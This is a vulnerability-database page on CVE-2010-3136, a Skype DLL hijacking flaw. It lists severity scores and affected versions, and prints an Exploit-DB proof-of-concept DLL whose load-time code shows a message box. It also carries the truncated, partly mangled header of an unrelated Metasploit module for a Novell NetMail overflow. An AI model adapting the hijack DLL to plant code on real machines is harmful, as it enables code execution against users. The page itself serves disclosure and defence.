CVE-2010-3136
published 2010-08-26CVE-2010-3136: Untrusted search path vulnerability in Skype 4.2.0.169 and earlier allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL…
PriorityP347critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
6.91%
93.3th percentile
Untrusted search path vulnerability in Skype 4.2.0.169 and earlier allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse wab32.dll that is located in the same folder as a .skype file.
Affected
150 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| skype | skype | <= 4.2.0.169 | — |
| skype | skype | — | — |
| skype | skype | — | — |
| skype | skype | — | — |
| skype | skype | — | — |
| skype | skype | — | — |
| skype | skype | — | — |
| skype | skype | — | — |
| skype | skype | — | — |
| skype | skype | — | — |
| skype | skype | — | — |
| skype | skype | — | — |
| skype | skype | — | — |
| skype | skype | — | — |
| skype | skype | — | — |
| skype | skype | — | — |
| skype | skype | — | — |
| skype | skype | — | — |
| skype | skype | — | — |
| skype | skype | — | — |
| skype | skype | — | — |
| skype | skype | — | — |
| skype | skype | — | — |
| skype | skype | — | — |
| skype | skype | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Skype 4.2.0.169 - 'wab32.dll' DLL Hijacking
exploitdb·2010-08-25
CVE-2010-3136 Skype 4.2.0.169 - 'wab32.dll' DLL Hijacking
Skype 4.2.0.169 - 'wab32.dll' DLL Hijacking
---
/*
Exploit Title: Skype
#define DllExport __declspec (dllexport)
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
dll_hijack();
return 0;
}
int dll_hijack()
{
MessageBox(0, "Skype DLL Hijacking!", "DLL Message", MB_OK);
return 0;
}
Exploit-DB
Novell NetMail 3.52d - IMAP Subscribe Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2006-6761 Novell NetMail 3.52d - IMAP Subscribe Buffer Overflow (Metasploit)
Novell NetMail 3.52d - IMAP Subscribe Buffer Overflow (Metasploit)
---
##
# $Id: novell_netmail_subscribe.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Novell NetMail %q{
This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP SUBSCRIBE
verb. By sending an overly long string, an attacker can overwrite the
buffer and control program execution.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2006-6761' ],
[ 'OSVDB', '3136
No writeups or analysis indexed.
http://www.exploit-db.com/exploits/14766https://exchange.xforce.ibmcloud.com/vulnerabilities/64577https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11833http://www.exploit-db.com/exploits/14766https://exchange.xforce.ibmcloud.com/vulnerabilities/64577https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11833
2010-08-26
Published